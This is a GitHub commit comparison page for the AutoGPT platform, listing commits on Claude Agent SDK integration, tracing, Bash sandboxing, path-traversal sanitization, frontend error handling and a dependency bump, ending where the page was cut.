Compare commits

...

68 Commits

Author SHA1 Message Date
Zamil Majdy
744fc59c18 fix(chat/sdk): validate proxy URL before blanking ANTHROPIC_API_KEY
Only override ANTHROPIC_API_KEY="" when both a valid base_url (starts
with http) and api_key are configured. Otherwise fall back to SDK
default credentials so direct Anthropic usage still works.
2026-02-12 13:37:59 +04:00
Zamil Majdy
58847cd242 refactor(chat): rename sdk_ config prefix to claude_agent_ for clarity
Also adds gt=0 validation on claude_agent_max_budget_usd per PR review.
2026-02-12 13:36:48 +04:00
Zamil Majdy
d8453bb304 feat(chat/sdk): route SDK through OpenRouter with model config and usage tracking
- Add sdk_model and sdk_max_budget_usd config fields for SDK-specific settings
- Route SDK CLI API calls through OpenRouter via env vars (ANTHROPIC_BASE_URL,
  ANTHROPIC_AUTH_TOKEN) for per-call token/cost tracking
- Pass model, env, user, and max_budget_usd to ClaudeAgentOptions
- Emit StreamUsage from ResultMessage in response adapter
- Persist token usage to session.usage in SDK streaming loop
- Fix tracing to use configured model instead of hardcoded default
- Update Anthropic fallback to use config.api_key/base_url (OpenRouter routing)
2026-02-12 13:12:42 +04:00
Zamil Majdy
d7f7a2747f fix(backend/chat): Atomic message append to prevent race condition
Replace the read-modify-write pattern in stream_chat_post with an
atomic append_and_save_message helper that acquires the session lock
before re-fetching and appending. This prevents message loss when
concurrent requests modify the same session.
2026-02-12 09:10:43 +04:00
Zamil Majdy
68849e197c format 2026-02-12 08:26:26 +04:00
Zamil Majdy
211478bb29 Revert "style: run ruff format and isort"
This reverts commit 40b58807ab.
2026-02-12 08:25:22 +04:00
Zamil Majdy
0e88dd15b2 feat(chat): add hook-based tracing integration for Claude Agent SDK
- Add create_tracing_hooks() for fine-grained tool timing
- Add merge_hooks() utility to combine security + tracing hooks
- Captures precise pre/post timing for tool executions
- Tracks tool failures via PostToolUseFailure hook
- Integrates seamlessly with existing security hooks
2026-02-12 03:35:16 +00:00
Zamil Majdy
7f3c227f0a feat(chat): add modular Langfuse tracing for Claude Agent SDK
- Create tracing.py with TracedSession context manager
- Automatically trace user messages, SDK messages, and results
- Capture tool calls with input/output and timing
- Log usage and cost from SDK ResultMessage
- No-op when Langfuse not configured (zero overhead)
- Clean integration into service.py via context manager
2026-02-12 03:33:37 +00:00
Zamil Majdy
40b58807ab style: run ruff format and isort 2026-02-12 03:25:19 +00:00
Zamil Majdy
d0e2e6f013 security(service): strengthen path validation for SDK cleanup
- Add empty check after session_id sanitization
- Add assertion for defense-in-depth
- Add explicit '..' traversal check in cleanup
- Replace glob with os.listdir to avoid glob injection
- Add validation that project_dir stays under ~/.claude/projects
- Add warning logs for rejected paths

Addresses CodeQL alert about uncontrolled data in path expression
2026-02-12 03:07:08 +00:00
Zamil Majdy
efdc8d73cc fix(security_hooks): use json.dumps for pattern matching and log warning
- Use json.dumps instead of str() for more predictable pattern matching
- Log warning when SDK not available and security hooks are disabled

Addresses CodeRabbit review feedback
2026-02-12 02:55:04 +00:00
Zamil Majdy
a34810d8a2 revert: remove Bash command extraction from GenericTool
Keep it simple - just show 'Bash completed' instead of special
handling to extract command names like 'jq completed'
2026-02-12 02:53:37 +00:00
Zamil Majdy
038b7d5841 feat(copilot): show specific command name for Bash tool
- Extract command name (jq, grep, etc.) from Bash tool input
- Display 'jq completed' instead of 'Bash completed'
- Add ripgrep and tree to Dockerfile (match ALLOWED_BASH_COMMANDS)
2026-02-12 02:48:19 +00:00
Zamil Majdy
cac93b0cc9 fix(chat): increase SDK buffer limit and add jq
- Add sdk_max_buffer_size config option (default 10MB, was 1MB)
- Pass max_buffer_size to ClaudeAgentOptions to prevent crashes on large tool outputs
- Install jq in Dockerfile for JSON processing capabilities

Fixes AUTOGPT-SERVER-7V2
2026-02-12 02:41:12 +00:00
Zamil Majdy
2025aaf5f2 fix(backend/chat): Preserve full MCP tool output for frontend widgets
The SDK CLI truncates large tool results (writing them to disk),
which breaks frontend widget rendering (e.g., find_block's block
list cards). Stash the full MCP tool output before the SDK sees it,
then use the stash in the response adapter so the frontend always
receives the complete JSON for proper widget parsing.
2026-02-11 23:13:42 +04:00
Zamil Majdy
ae9bce3bae feat(backend/chat): Add sandboxed Bash and notify SDK of restrictions
- Allow Bash tool with command allowlist (jq, grep, head, tail, etc.)
  validated via shlex.split for proper quote handling
- Add workspace path validation for Bash absolute paths
- Add SDK built-in tools (Read/Write/Edit/Glob/Grep/Bash) to allowed_tools
- Append Bash restrictions to system prompt (SDK doesn't know our allowlist)
- Add default_factory to BlockInfoSummary schema fields
- Add 12 Bash sandbox tests covering safe/dangerous commands, substitution,
  redirection, /dev/ access, path escaping
2026-02-11 22:35:39 +04:00
Zamil Majdy
3107d889fc feat(frontend/copilot): Add generic tool widget for unrecognized tools
SDK built-in tools (Read, Glob, Grep, etc.) have no dedicated frontend
widget, so tool calls silently disappeared. Add a GenericTool component
that shows a spinning gear + "Running {tool}…" for any tool-* part
type that doesn't match a known case.
2026-02-11 22:08:03 +04:00
Zamil Majdy
f174fb6303 fix(backend/chat): Strip MCP prefix from SDK tool names for frontend rendering
The Vercel AI SDK frontend renders tool widgets based on tool name
(e.g. "tool-find_block", "tool-run_agent"). The SDK sends tool names
with the MCP prefix (mcp__copilot__find_block) which didn't match
any frontend switch case, causing tool execution to be invisible.

Strip the mcp__copilot__ prefix in the response adapter so tool events
reach the correct frontend widget handlers.
2026-02-11 22:01:59 +04:00
Zamil Majdy
920a4c5f15 feat(backend/chat): Allow Read/Write/Edit/Glob/Grep in SDK within workspace
Move these tools from fully-blocked to workspace-scoped: they are now
allowed when the file path stays within the SDK working directory
(/tmp/copilot-<session>/) or the tool-results directory
(~/.claude/projects/…/tool-results/). This enables the SDK's built-in
oversized tool result handling and workspace file operations.

- Add _validate_workspace_path() with normpath-based path validation
- Pass sdk_cwd from service.py into create_security_hooks()
- Add 20 unit tests covering allowed/denied paths, traversal attacks
2026-02-11 20:39:33 +04:00
Zamil Majdy
e95fadbb86 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-11 20:23:56 +04:00
Zamil Majdy
b14b3803ad feat(backend/chat): Add StreamStartStep/StreamFinishStep to SDK adapter
The non-SDK path emits step boundaries (StartStep/FinishStep) around
each LLM turn and tool cycle. The SDK adapter was missing these,
causing the frontend to lack visual step framing for tool calls.

Now the SDK adapter emits:
- StreamStartStep after init and before each new LLM turn
- StreamFinishStep after tool results and before final finish
2026-02-11 20:18:27 +04:00
Otto
36aeb0b2b3 docs(blocks): clarify HumanInTheLoop output descriptions for agent builder (#12069)
## Problem

The agent builder (LLM) misinterprets the HumanInTheLoop block outputs.
It thinks `approved_data` and `rejected_data` will yield status strings
like "APPROVED" or "REJECTED" instead of understanding that the actual
input data passes through.

This leads to unnecessary complexity - the agent builder adds comparison
blocks to check for status strings that don't exist.

## Solution

Enriched the block docstring and all input/output field descriptions to
make it explicit that:
1. The output is the actual data itself, not a status string
2. The routing is determined by which output pin fires
3. How to use the block correctly (connect downstream blocks to
appropriate output pins)

## Changes

- Updated block docstring with clear "How it works" and "Example usage"
sections
- Enhanced `data` input description to explain data flow
- Enhanced `name` input description for reviewer context
- Enhanced `approved_data` output to explicitly state it's NOT a status
string
- Enhanced `rejected_data` output to explicitly state it's NOT a status
string
- Enhanced `review_message` output for clarity

## Testing

Documentation-only change to schema descriptions. No functional changes.

Fixes SECRT-1930

<!-- greptile_comment -->

<h2>Greptile Overview</h2>

<details><summary><h3>Greptile Summary</h3></summary>

Enhanced documentation for the `HumanInTheLoopBlock` to clarify how
output pins work. The key improvement explicitly states that output pins
(`approved_data` and `rejected_data`) yield the actual input data, not
status strings like "APPROVED" or "REJECTED". This prevents the agent
builder (LLM) from misinterpreting the block's behavior and adding
unnecessary comparison blocks.

**Key changes:**
- Added "How it works" and "Example usage" sections to the block
docstring
- Clarified that routing is determined by which output pin fires, not by
comparing output values
- Enhanced all input/output field descriptions with explicit data flow
explanations
- Emphasized that downstream blocks should be connected to the
appropriate output pin based on desired workflow path

This is a documentation-only change with no functional modifications to
the code logic.
</details>


<details><summary><h3>Confidence Score: 5/5</h3></summary>

- This PR is safe to merge with no risk
- Documentation-only change that accurately reflects the existing code
behavior. No functional changes, no runtime impact, and the enhanced
descriptions correctly explain how the block outputs work based on
verification of the implementation code.
- No files require special attention
</details>


<!-- greptile_other_comments_section -->

<!-- /greptile_comment -->

Co-authored-by: Zamil Majdy <zamil.majdy@agpt.co>
2026-02-11 15:43:58 +00:00
Ubbe
2a189c44c4 fix(frontend): API stream issues leaking into prompt (#12063)
## Changes 🏗️

<img width="800" height="621" alt="Screenshot 2026-02-11 at 19 32 39"
src="https://github.com/user-attachments/assets/e97be1a7-972e-4ae0-8dfa-6ade63cf287b"
/>

When the BE API has an error, prevent it from leaking into the stream
and instead handle it gracefully via toast.

## Checklist 📋

### For code changes:
- [x] I have clearly listed my changes in the PR description
- [x] I have made a test plan
- [x] I have tested my changes according to the test plan:
  - [x] Run the app locally and trust the changes

<!-- greptile_comment -->

<h2>Greptile Overview</h2>

<details><summary><h3>Greptile Summary</h3></summary>

This PR fixes an issue where backend API stream errors were leaking into
the chat prompt instead of being handled gracefully. The fix involves
both backend and frontend changes to ensure error events conform to the
AI SDK's strict schema.

**Key Changes:**
- **Backend (`response_model.py`)**: Added custom `to_sse()` method for
`StreamError` that only emits `type` and `errorText` fields, stripping
extra fields like `code` and `details` that cause AI SDK validation
failures
- **Backend (`prompt.py`)**: Added validation step after context
compression to remove orphaned tool responses without matching tool
calls, preventing "unexpected tool_use_id" API errors
- **Frontend (`route.ts`)**: Implemented SSE stream normalization with
`normalizeSSEStream()` and `normalizeSSEEvent()` functions to strip
non-conforming fields from error events before they reach the AI SDK
- **Frontend (`ChatMessagesContainer.tsx`)**: Added toast notifications
for errors and improved error display UI with deduplication logic

The changes ensure a clean separation between internal error metadata
(useful for logging/debugging) and the strict schema required by the AI
SDK on the frontend.
</details>


<details><summary><h3>Confidence Score: 4/5</h3></summary>

- This PR is safe to merge with low risk
- The changes are well-structured and address a specific bug with proper
error handling. The dual-layer approach (backend filtering in `to_sse()`
+ frontend normalization) provides defense-in-depth. However, the lack
of automated tests for the new error normalization logic and the
potential for edge cases in SSE parsing prevent a perfect score.
- Pay close attention to
`autogpt_platform/frontend/src/app/api/chat/sessions/[sessionId]/stream/route.ts`
- the SSE normalization logic should be tested with various error
scenarios
</details>


<details><summary><h3>Sequence Diagram</h3></summary>

```mermaid
sequenceDiagram
    participant User
    participant Frontend as ChatMessagesContainer
    participant Proxy as /api/chat/.../stream
    participant Backend as Backend API
    participant AISDK as AI SDK

    User->>Frontend: Send message
    Frontend->>Proxy: POST with message
    Proxy->>Backend: Forward request with auth
    Backend->>Backend: Process message
    
    alt Success Path
        Backend->>Proxy: SSE stream (text-delta, etc.)
        Proxy->>Proxy: normalizeSSEStream (pass through)
        Proxy->>AISDK: Forward SSE events
        AISDK->>Frontend: Update messages
        Frontend->>User: Display response
    else Error Path
        Backend->>Backend: StreamError.to_sse()
        Note over Backend: Only emit {type, errorText}
        Backend->>Proxy: SSE error event
        Proxy->>Proxy: normalizeSSEEvent()
        Note over Proxy: Strip extra fields (code, details)
        Proxy->>AISDK: {type: "error", errorText: "..."}
        AISDK->>Frontend: error state updated
        Frontend->>Frontend: Toast notification (deduplicated)
        Frontend->>User: Show error UI + toast
    end
```
</details>


<!-- greptile_other_comments_section -->

<!-- /greptile_comment -->

---------

Co-authored-by: greptile-apps[bot] <165735046+greptile-apps[bot]@users.noreply.github.com>
Co-authored-by: Otto-AGPT <otto@agpt.co>
2026-02-11 22:46:37 +08:00
Abhimanyu Yadav
508759610f fix(frontend): add min-width-0 to ContentCard to prevent overflow (#12060)
### Changes 🏗️

Added `min-w-0` class to the ContentCard component in the ToolAccordion
to prevent content overflow issues. This CSS fix ensures that the card
properly respects its container width constraints and allows text
truncation to work correctly when content is too wide.

### Checklist 📋

#### For code changes:
- [x] I have clearly listed my changes in the PR description
- [x] I have made a test plan
- [x] I have tested my changes according to the test plan:
  - [x] Verified that tool content displays correctly in the accordion
- [x] Confirmed that long content properly truncates instead of
overflowing
  - [x] Tested with various screen sizes to ensure responsive behavior

#### For configuration changes:

- [x] `.env.default` is updated or already compatible with my changes
- [x] `docker-compose.yml` is updated or already compatible with my
changes

<!-- greptile_comment -->

<h2>Greptile Overview</h2>

<details><summary><h3>Greptile Summary</h3></summary>

Added `min-w-0` class to `ContentCard` component to fix text truncation
overflow in grid layouts. This is a standard CSS fix that allows grid
items to shrink below their content size, enabling `truncate` classes on
child elements (`ContentCardTitle`, `ContentCardSubtitle`) to work
correctly. The fix follows the same pattern already used in
`ContentCardHeader` (line 54) and `ToolAccordion` (line 54).
</details>


<details><summary><h3>Confidence Score: 5/5</h3></summary>

- Safe to merge with no risk
- Single-line CSS fix that addresses a well-known flexbox/grid layout
issue. The change follows existing patterns in the codebase and is
thoroughly tested. No logic changes, no breaking changes, no side
effects.
- No files require special attention
</details>


<!-- greptile_other_comments_section -->

<!-- /greptile_comment -->
2026-02-11 21:09:21 +08:00
Otto
062fe1aa70 fix(security): enforce disabled flag on blocks in graph validation (#12059)
## Summary
Blocks marked `disabled=True` (like BlockInstallationBlock) were not
being checked during graph validation, allowing them to be used via
direct API calls despite being hidden from the UI.

This adds a security check in `_validate_graph_get_errors()` to reject
any graph containing disabled blocks.

## Security Advisory
GHSA-4crw-9p35-9x54

## Linear
SECRT-1927

## Changes
- Added `block.disabled` check in graph validation (6 lines)

## Testing
- Graphs with disabled blocks → rejected with clear error message
- Graphs with valid blocks → unchanged behavior

<!-- greptile_comment -->

<h2>Greptile Overview</h2>

<details><summary><h3>Greptile Summary</h3></summary>

Adds critical security validation to prevent execution of disabled
blocks (like `BlockInstallationBlock`) via direct API calls. The fix
validates that `block.disabled` is `False` during graph validation in
`_validate_graph_get_errors()` on line 747-750, ensuring disabled blocks
are rejected before graph creation or execution. This closes a
vulnerability where blocks marked disabled in the UI could still be used
through API endpoints.
</details>


<details><summary><h3>Confidence Score: 5/5</h3></summary>

- This PR is safe to merge and addresses a critical security
vulnerability
- The fix is minimal (6 lines), correctly placed in the validation flow,
includes clear security context (GHSA reference), and follows existing
validation patterns. The check is positioned after block existence
validation and before input validation, ensuring disabled blocks are
caught early in both graph creation and execution paths.
- No files require special attention
</details>


<!-- greptile_other_comments_section -->

<!-- /greptile_comment -->

---------

Co-authored-by: Nicholas Tindle <nicholas.tindle@agpt.co>
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-11 03:28:19 +00:00
Zamil Majdy
82c483d6c8 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-11 07:17:38 +04:00
Zamil Majdy
7cffa1895f fix(backend/chat): Filter duplicate StreamStart from non-SDK path
Routes.py already publishes a StreamStart before calling the service.
The SDK path filters the duplicate internally, but the non-SDK path
did not, causing two StreamStart events to reach the frontend.
2026-02-11 06:52:47 +04:00
Zamil Majdy
9791bdd724 fix(backend/chat): Use normpath+startswith pattern for CodeQL path sanitization
CodeQL doesn't recognize re.sub as a path sanitizer. Switch to the
os.path.normpath + startswith prefix check pattern that CodeQL's
taint model explicitly recognizes as breaking the taint chain.
2026-02-11 06:45:12 +04:00
Zamil Majdy
750a674c78 fix lock 2026-02-11 06:39:03 +04:00
Zamil Majdy
960c7980a3 fix(backend/chat): Use named helper for session_id sanitization to satisfy CodeQL
Replace inline comprehension with _sanitize_session_id() using re.sub
so CodeQL recognizes the path-traversal sanitization barrier.
2026-02-11 06:32:16 +04:00
Zamil Majdy
e85d437bb2 fix(backend/chat): Sanitize session_id in SDK cwd path to prevent path traversal 2026-02-11 06:26:48 +04:00
dependabot[bot]
2cd0d4fe0f chore(deps): bump actions/checkout from 4 to 6 (#12034)
Bumps [actions/checkout](https://github.com/actions/checkout) from 4 to
6.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/actions/checkout/releases">actions/checkout's
releases</a>.</em></p>
<blockquote>
<h2>v6.0.0</h2>
<h2>What's Changed</h2>
<ul>
<li>Update README to include Node.js 24 support details and requirements
by <a href="https://github.com/salmanmkc"><code>@​salmanmkc</code></a>
in <a
href="https://redirect.github.com/actions/checkout/pull/2248">actions/checkout#2248</a></li>
<li>Persist creds to a separate file by <a
href="https://github.com/ericsciple"><code>@​ericsciple</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2286">actions/checkout#2286</a></li>
<li>v6-beta by <a
href="https://github.com/ericsciple"><code>@​ericsciple</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2298">actions/checkout#2298</a></li>
<li>update readme/changelog for v6 by <a
href="https://github.com/ericsciple"><code>@​ericsciple</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2311">actions/checkout#2311</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a
href="https://github.com/actions/checkout/compare/v5.0.0...v6.0.0">https://github.com/actions/checkout/compare/v5.0.0...v6.0.0</a></p>
<h2>v6-beta</h2>
<h2>What's Changed</h2>
<p>Updated persist-credentials to store the credentials under
<code>$RUNNER_TEMP</code> instead of directly in the local git
config.</p>
<p>This requires a minimum Actions Runner version of <a
href="https://github.com/actions/runner/releases/tag/v2.329.0">v2.329.0</a>
to access the persisted credentials for <a
href="https://docs.github.com/en/actions/tutorials/use-containerized-services/create-a-docker-container-action">Docker
container action</a> scenarios.</p>
<h2>v5.0.1</h2>
<h2>What's Changed</h2>
<ul>
<li>Port v6 cleanup to v5 by <a
href="https://github.com/ericsciple"><code>@​ericsciple</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2301">actions/checkout#2301</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a
href="https://github.com/actions/checkout/compare/v5...v5.0.1">https://github.com/actions/checkout/compare/v5...v5.0.1</a></p>
<h2>v5.0.0</h2>
<h2>What's Changed</h2>
<ul>
<li>Update actions checkout to use node 24 by <a
href="https://github.com/salmanmkc"><code>@​salmanmkc</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2226">actions/checkout#2226</a></li>
<li>Prepare v5.0.0 release by <a
href="https://github.com/salmanmkc"><code>@​salmanmkc</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2238">actions/checkout#2238</a></li>
</ul>
<h2>⚠️ Minimum Compatible Runner Version</h2>
<p><strong>v2.327.1</strong><br />
<a
href="https://github.com/actions/runner/releases/tag/v2.327.1">Release
Notes</a></p>
<p>Make sure your runner is updated to this version or newer to use this
release.</p>
<p><strong>Full Changelog</strong>: <a
href="https://github.com/actions/checkout/compare/v4...v5.0.0">https://github.com/actions/checkout/compare/v4...v5.0.0</a></p>
<h2>v4.3.1</h2>
<h2>What's Changed</h2>
<ul>
<li>Port v6 cleanup to v4 by <a
href="https://github.com/ericsciple"><code>@​ericsciple</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2305">actions/checkout#2305</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a
href="https://github.com/actions/checkout/compare/v4...v4.3.1">https://github.com/actions/checkout/compare/v4...v4.3.1</a></p>
<h2>v4.3.0</h2>
<h2>What's Changed</h2>
<ul>
<li>docs: update README.md by <a
href="https://github.com/motss"><code>@​motss</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/1971">actions/checkout#1971</a></li>
<li>Add internal repos for checking out multiple repositories by <a
href="https://github.com/mouismail"><code>@​mouismail</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/1977">actions/checkout#1977</a></li>
<li>Documentation update - add recommended permissions to Readme by <a
href="https://github.com/benwells"><code>@​benwells</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2043">actions/checkout#2043</a></li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/actions/checkout/blob/main/CHANGELOG.md">actions/checkout's
changelog</a>.</em></p>
<blockquote>
<h1>Changelog</h1>
<h2>v6.0.2</h2>
<ul>
<li>Fix tag handling: preserve annotations and explicit fetch-tags by <a
href="https://github.com/ericsciple"><code>@​ericsciple</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2356">actions/checkout#2356</a></li>
</ul>
<h2>v6.0.1</h2>
<ul>
<li>Add worktree support for persist-credentials includeIf by <a
href="https://github.com/ericsciple"><code>@​ericsciple</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2327">actions/checkout#2327</a></li>
</ul>
<h2>v6.0.0</h2>
<ul>
<li>Persist creds to a separate file by <a
href="https://github.com/ericsciple"><code>@​ericsciple</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2286">actions/checkout#2286</a></li>
<li>Update README to include Node.js 24 support details and requirements
by <a href="https://github.com/salmanmkc"><code>@​salmanmkc</code></a>
in <a
href="https://redirect.github.com/actions/checkout/pull/2248">actions/checkout#2248</a></li>
</ul>
<h2>v5.0.1</h2>
<ul>
<li>Port v6 cleanup to v5 by <a
href="https://github.com/ericsciple"><code>@​ericsciple</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2301">actions/checkout#2301</a></li>
</ul>
<h2>v5.0.0</h2>
<ul>
<li>Update actions checkout to use node 24 by <a
href="https://github.com/salmanmkc"><code>@​salmanmkc</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2226">actions/checkout#2226</a></li>
</ul>
<h2>v4.3.1</h2>
<ul>
<li>Port v6 cleanup to v4 by <a
href="https://github.com/ericsciple"><code>@​ericsciple</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2305">actions/checkout#2305</a></li>
</ul>
<h2>v4.3.0</h2>
<ul>
<li>docs: update README.md by <a
href="https://github.com/motss"><code>@​motss</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/1971">actions/checkout#1971</a></li>
<li>Add internal repos for checking out multiple repositories by <a
href="https://github.com/mouismail"><code>@​mouismail</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/1977">actions/checkout#1977</a></li>
<li>Documentation update - add recommended permissions to Readme by <a
href="https://github.com/benwells"><code>@​benwells</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2043">actions/checkout#2043</a></li>
<li>Adjust positioning of user email note and permissions heading by <a
href="https://github.com/joshmgross"><code>@​joshmgross</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2044">actions/checkout#2044</a></li>
<li>Update README.md by <a
href="https://github.com/nebuk89"><code>@​nebuk89</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2194">actions/checkout#2194</a></li>
<li>Update CODEOWNERS for actions by <a
href="https://github.com/TingluoHuang"><code>@​TingluoHuang</code></a>
in <a
href="https://redirect.github.com/actions/checkout/pull/2224">actions/checkout#2224</a></li>
<li>Update package dependencies by <a
href="https://github.com/salmanmkc"><code>@​salmanmkc</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/2236">actions/checkout#2236</a></li>
</ul>
<h2>v4.2.2</h2>
<ul>
<li><code>url-helper.ts</code> now leverages well-known environment
variables by <a href="https://github.com/jww3"><code>@​jww3</code></a>
in <a
href="https://redirect.github.com/actions/checkout/pull/1941">actions/checkout#1941</a></li>
<li>Expand unit test coverage for <code>isGhes</code> by <a
href="https://github.com/jww3"><code>@​jww3</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/1946">actions/checkout#1946</a></li>
</ul>
<h2>v4.2.1</h2>
<ul>
<li>Check out other refs/* by commit if provided, fall back to ref by <a
href="https://github.com/orhantoy"><code>@​orhantoy</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/1924">actions/checkout#1924</a></li>
</ul>
<h2>v4.2.0</h2>
<ul>
<li>Add Ref and Commit outputs by <a
href="https://github.com/lucacome"><code>@​lucacome</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/1180">actions/checkout#1180</a></li>
<li>Dependency updates by <a
href="https://github.com/dependabot"><code>@​dependabot</code></a>- <a
href="https://redirect.github.com/actions/checkout/pull/1777">actions/checkout#1777</a>,
<a
href="https://redirect.github.com/actions/checkout/pull/1872">actions/checkout#1872</a></li>
</ul>
<h2>v4.1.7</h2>
<ul>
<li>Bump the minor-npm-dependencies group across 1 directory with 4
updates by <a
href="https://github.com/dependabot"><code>@​dependabot</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/1739">actions/checkout#1739</a></li>
<li>Bump actions/checkout from 3 to 4 by <a
href="https://github.com/dependabot"><code>@​dependabot</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/1697">actions/checkout#1697</a></li>
<li>Check out other refs/* by commit by <a
href="https://github.com/orhantoy"><code>@​orhantoy</code></a> in <a
href="https://redirect.github.com/actions/checkout/pull/1774">actions/checkout#1774</a></li>
<li>Pin actions/checkout's own workflows to a known, good, stable
version. by <a href="https://github.com/jww3"><code>@​jww3</code></a> in
<a
href="https://redirect.github.com/actions/checkout/pull/1776">actions/checkout#1776</a></li>
</ul>
<h2>v4.1.6</h2>
<ul>
<li>Check platform to set archive extension appropriately by <a
href="https://github.com/cory-miller"><code>@​cory-miller</code></a> in
<a
href="https://redirect.github.com/actions/checkout/pull/1732">actions/checkout#1732</a></li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="de0fac2e45"><code>de0fac2</code></a>
Fix tag handling: preserve annotations and explicit fetch-tags (<a
href="https://redirect.github.com/actions/checkout/issues/2356">#2356</a>)</li>
<li><a
href="064fe7f331"><code>064fe7f</code></a>
Add orchestration_id to git user-agent when ACTIONS_ORCHESTRATION_ID is
set (...</li>
<li><a
href="8e8c483db8"><code>8e8c483</code></a>
Clarify v6 README (<a
href="https://redirect.github.com/actions/checkout/issues/2328">#2328</a>)</li>
<li><a
href="033fa0dc0b"><code>033fa0d</code></a>
Add worktree support for persist-credentials includeIf (<a
href="https://redirect.github.com/actions/checkout/issues/2327">#2327</a>)</li>
<li><a
href="c2d88d3ecc"><code>c2d88d3</code></a>
Update all references from v5 and v4 to v6 (<a
href="https://redirect.github.com/actions/checkout/issues/2314">#2314</a>)</li>
<li><a
href="1af3b93b68"><code>1af3b93</code></a>
update readme/changelog for v6 (<a
href="https://redirect.github.com/actions/checkout/issues/2311">#2311</a>)</li>
<li><a
href="71cf2267d8"><code>71cf226</code></a>
v6-beta (<a
href="https://redirect.github.com/actions/checkout/issues/2298">#2298</a>)</li>
<li><a
href="069c695914"><code>069c695</code></a>
Persist creds to a separate file (<a
href="https://redirect.github.com/actions/checkout/issues/2286">#2286</a>)</li>
<li><a
href="ff7abcd0c3"><code>ff7abcd</code></a>
Update README to include Node.js 24 support details and requirements (<a
href="https://redirect.github.com/actions/checkout/issues/2248">#2248</a>)</li>
<li><a
href="08c6903cd8"><code>08c6903</code></a>
Prepare v5.0.0 release (<a
href="https://redirect.github.com/actions/checkout/issues/2238">#2238</a>)</li>
<li>Additional commits viewable in <a
href="https://github.com/actions/checkout/compare/v4...v6">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=actions/checkout&package-manager=github_actions&previous-version=4&new-version=6)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)


</details>

---------

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Otto <otto@agpt.co>
2026-02-11 02:25:51 +00:00
Zamil Majdy
44f9536bd6 fix lock 2026-02-11 06:24:41 +04:00
Zamil Majdy
1c1085a227 Merge remote-tracking branch 'origin/dev' into feat/copitlot-claude-code
# Conflicts:
#	autogpt_platform/backend/backend/api/features/chat/config.py
#	autogpt_platform/backend/poetry.lock
2026-02-11 05:30:46 +04:00
Zamil Majdy
d7ef70469e fix(backend/chat): Fix cleanup race condition and move to outer finally
- Use session-specific temp dir (/tmp/copilot-{session_id}) as SDK cwd
  to prevent concurrent sessions from deleting each other's tool-result
  files during cleanup
- Move _cleanup_sdk_tool_results() to outer finally block so it runs
  even when the outer except Exception fires
- Clean up the temp cwd directory after each session
- Remove unnecessary inner try/finally nesting
2026-02-11 05:13:02 +04:00
Zamil Majdy
1926127ddd fix(backend/chat): Fix bugs and remove dead code in SDK integration
- Fix message accumulation bug: reset has_appended_assistant when
  creating new post-tool assistant message to prevent lost text deltas
- Fix hardcoded model in anthropic_fallback.py: use config.model instead
  of hardcoded "claude-sonnet-4-20250514"
- Fix _SDK_TOOL_RESULTS_DIR using hardcoded /root/ path: use expanduser
- Remove unused create_strict_security_hooks (~75 lines)
- Remove unused create_heartbeat/create_usage from response adapter
- Remove unused RAW_TOOL_NAMES from tool_adapter
- Extract _MAX_TOOL_ITERATIONS constant from magic number
2026-02-11 04:42:05 +04:00
Zamil Majdy
8b509e56de refactor(backend/chat): Replace --resume with conversation context, add compaction and dedup
- Remove broken --resume/session file approach (CLI v2.1.38 can't load
